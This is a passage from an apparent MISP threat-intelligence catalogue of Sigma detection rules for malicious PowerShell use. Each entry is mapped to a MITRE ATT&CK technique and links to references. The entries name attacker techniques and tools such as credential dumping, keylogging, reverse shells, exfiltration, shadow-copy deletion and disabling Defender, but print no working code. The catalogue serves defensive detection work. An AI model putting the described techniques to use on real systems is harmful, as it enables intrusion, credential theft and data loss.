  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9647. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml

Zip A Folder With PowerShell For Staging In Temp - PowerShell Module

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Zip A Folder With PowerShell For Staging In Temp - PowerShell Module"

Zip A Folder With PowerShell For Staging In Temp - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 9648. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml

Change User Agents with WebRequest

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

The tag is: misp-galaxy:sigma-rules="Change User Agents with WebRequest"

Change User Agents with WebRequest has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 9649. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml

Powershell Token Obfuscation - Powershell

Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation

The tag is: misp-galaxy:sigma-rules="Powershell Token Obfuscation - Powershell"

Powershell Token Obfuscation - Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Embedded Payloads - T1027.009" with estimative-language:likelihood-probability="almost-certain"

Table 9651. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml

Usage Of Web Request Commands And Cmdlets - ScriptBlock

Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs

The tag is: misp-galaxy:sigma-rules="Usage Of Web Request Commands And Cmdlets - ScriptBlock"

Usage Of Web Request Commands And Cmdlets - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9652. Table References

Links

https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell

https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock

Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.

The tag is: misp-galaxy:sigma-rules="Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock"

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9653. Table References

Links

https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml

Powershell Install a DLL in System Directory

Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"

The tag is: misp-galaxy:sigma-rules="Powershell Install a DLL in System Directory"

Powershell Install a DLL in System Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"

Table 9654. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml

PowerShell WMI Win32_Product Install MSI

Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class

The tag is: misp-galaxy:sigma-rules="PowerShell WMI Win32_Product Install MSI"

PowerShell WMI Win32_Product Install MSI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 9655. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml

Invoke-Obfuscation STDIN+ Launcher - Powershell

Detects Obfuscated use of stdin to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation STDIN+ Launcher - Powershell"

Invoke-Obfuscation STDIN+ Launcher - Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9656. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml

PowerShell Remote Session Creation

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system

The tag is: misp-galaxy:sigma-rules="PowerShell Remote Session Creation"

PowerShell Remote Session Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9657. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml

Extracting Information with PowerShell

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

The tag is: misp-galaxy:sigma-rules="Extracting Information with PowerShell"

Extracting Information with PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 9658. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml

Delete Volume Shadow Copies via WMI with PowerShell - PS Script

Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

The tag is: misp-galaxy:sigma-rules="Delete Volume Shadow Copies via WMI with PowerShell - PS Script"

Delete Volume Shadow Copies via WMI with PowerShell - PS Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9659. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml

Tamper Windows Defender - ScriptBlockLogging

Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.

The tag is: misp-galaxy:sigma-rules="Tamper Windows Defender - ScriptBlockLogging"

Tamper Windows Defender - ScriptBlockLogging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9660. Table References

Links

https://bidouillesecurity.com/disable-windows-defender-in-powershell/

https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml

Suspicious PowerShell WindowStyle Option

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell WindowStyle Option"

Suspicious PowerShell WindowStyle Option has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

Table 9661. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml

Powershell MsXml COM Object

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code

The tag is: misp-galaxy:sigma-rules="Powershell MsXml COM Object"

Powershell MsXml COM Object has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9662. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt

https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml

Powershell Detect Virtualization Environment

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox

The tag is: misp-galaxy:sigma-rules="Powershell Detect Virtualization Environment"

Powershell Detect Virtualization Environment has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

Table 9663. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md

https://techgenix.com/malicious-powershell-scripts-evade-detection/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell"

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9664. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml

Potential PowerShell Obfuscation Using Character Join

Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Obfuscation Using Character Join"

Potential PowerShell Obfuscation Using Character Join has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9665. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml

PowerView PowerShell Cmdlets - ScriptBlock

Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.

The tag is: misp-galaxy:sigma-rules="PowerView PowerShell Cmdlets - ScriptBlock"

PowerView PowerShell Cmdlets - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9666. Table References

Links

https://adsecurity.org/?p=2277

https://powersploit.readthedocs.io/en/stable/Recon/README

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

https://thedfirreport.com/2020/10/08/ryuks-return

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml

PowerShell Create Local User

Detects creation of a local user via PowerShell

The tag is: misp-galaxy:sigma-rules="PowerShell Create Local User"

PowerShell Create Local User has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 9667. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml

PSAsyncShell - Asynchronous TCP Reverse Shell

Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell

The tag is: misp-galaxy:sigma-rules="PSAsyncShell - Asynchronous TCP Reverse Shell"

PSAsyncShell - Asynchronous TCP Reverse Shell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9668. Table References

Links

https://github.com/JoelGMSec/PSAsyncShell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml

Powershell Exfiltration Over SMTP

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

The tag is: misp-galaxy:sigma-rules="Powershell Exfiltration Over SMTP"

Powershell Exfiltration Over SMTP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 9669. Table References

Links

https://www.ietf.org/rfc/rfc2821.txt

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml

Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

The tag is: misp-galaxy:sigma-rules="Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell"

Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 9670. Table References

Links

https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml

Potential Persistence Via PowerShell User Profile Using Add-Content

Detects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via PowerShell User Profile Using Add-Content"

Potential Persistence Via PowerShell User Profile Using Add-Content has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"

Table 9671. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_profile_tampering.yml

Abuse of Service Permissions to Hide Services Via Set-Service - PS

Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"…​etc. (Works only in powershell 7)

The tag is: misp-galaxy:sigma-rules="Abuse of Service Permissions to Hide Services Via Set-Service - PS"

Abuse of Service Permissions to Hide Services Via Set-Service - PS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 9672. Table References

Links

https://twitter.com/Alh4zr3d/status/1580925761996828672

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml

Suspicious PowerShell Invocations - Generic

Detects suspicious PowerShell invocation command parameters

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocations - Generic"

Suspicious PowerShell Invocations - Generic has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9673. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml

SyncAppvPublishingServer Execution to Bypass Powershell Restriction

Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.

The tag is: misp-galaxy:sigma-rules="SyncAppvPublishingServer Execution to Bypass Powershell Restriction"

SyncAppvPublishingServer Execution to Bypass Powershell Restriction has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9674. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml

Automated Collection Command PowerShell

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

The tag is: misp-galaxy:sigma-rules="Automated Collection Command PowerShell"

Automated Collection Command PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 9675. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml

Windows Firewall Profile Disabled

Detects when a user disables the Windows Firewall via a Profile to help evade defense.

The tag is: misp-galaxy:sigma-rules="Windows Firewall Profile Disabled"

Windows Firewall Profile Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 9676. Table References

Links

https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html

https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps

http://powershellhelp.space/commands/set-netfirewallrule-psv5.php

http://woshub.com/manage-windows-firewall-powershell/

https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml

Manipulation of User Computer or Group Security Principals Across AD

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..

The tag is: misp-galaxy:sigma-rules="Manipulation of User Computer or Group Security Principals Across AD"

Manipulation of User Computer or Group Security Principals Across AD has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

Table 9677. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell

https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml

Potential Data Exfiltration Via Audio File

Detects potential exfiltration attempt via audio file using PowerShell

The tag is: misp-galaxy:sigma-rules="Potential Data Exfiltration Via Audio File"

Table 9678. Table References

Links

https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml

Disable Powershell Command History

Detects scripts or commands that disabled the Powershell command history by removing psreadline module

The tag is: misp-galaxy:sigma-rules="Disable Powershell Command History"

Disable Powershell Command History has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 9679. Table References

Links

https://twitter.com/DissectMalware/status/1062879286749773824

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml

Powershell Keylogging

Adversaries may log user keystrokes to intercept credentials as the user types them.

The tag is: misp-galaxy:sigma-rules="Powershell Keylogging"

Powershell Keylogging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 9680. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml

Access to Browser Login Data

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

The tag is: misp-galaxy:sigma-rules="Access to Browser Login Data"

Access to Browser Login Data has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 9681. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml

Import PowerShell Modules From Suspicious Directories

Detects powershell scripts that import modules from suspicious directories

The tag is: misp-galaxy:sigma-rules="Import PowerShell Modules From Suspicious Directories"

Import PowerShell Modules From Suspicious Directories has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9683. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml

Powershell Sensitive File Discovery

Detect adversaries enumerate sensitive files

The tag is: misp-galaxy:sigma-rules="Powershell Sensitive File Discovery"

Powershell Sensitive File Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 9684. Table References

Links

https://twitter.com/malmoeb/status/1570814999370801158

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml

PowerShell Script With File Hostname Resolving Capabilities

Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.

The tag is: misp-galaxy:sigma-rules="PowerShell Script With File Hostname Resolving Capabilities"

PowerShell Script With File Hostname Resolving Capabilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 9685. Table References

Links

https://www.fortypoundhead.com/showcontent.asp?artid=24022

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml

Dump Credentials from Windows Credential Manager With PowerShell

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

The tag is: misp-galaxy:sigma-rules="Dump Credentials from Windows Credential Manager With PowerShell"

Dump Credentials from Windows Credential Manager With PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

Table 9686. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml

Suspicious SSL Connection

Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.

The tag is: misp-galaxy:sigma-rules="Suspicious SSL Connection"

Suspicious SSL Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

Table 9687. Table References

Links

https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml

Potential In-Memory Execution Using Reflection.Assembly

Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory

The tag is: misp-galaxy:sigma-rules="Potential In-Memory Execution Using Reflection.Assembly"

Potential In-Memory Execution Using Reflection.Assembly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620" with estimative-language:likelihood-probability="almost-certain"

Table 9688. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml

HackTool - WinPwn Execution - ScriptBlock

Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.

The tag is: misp-galaxy:sigma-rules="HackTool - WinPwn Execution - ScriptBlock"

HackTool - WinPwn Execution - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 9689. Table References

Links

https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841

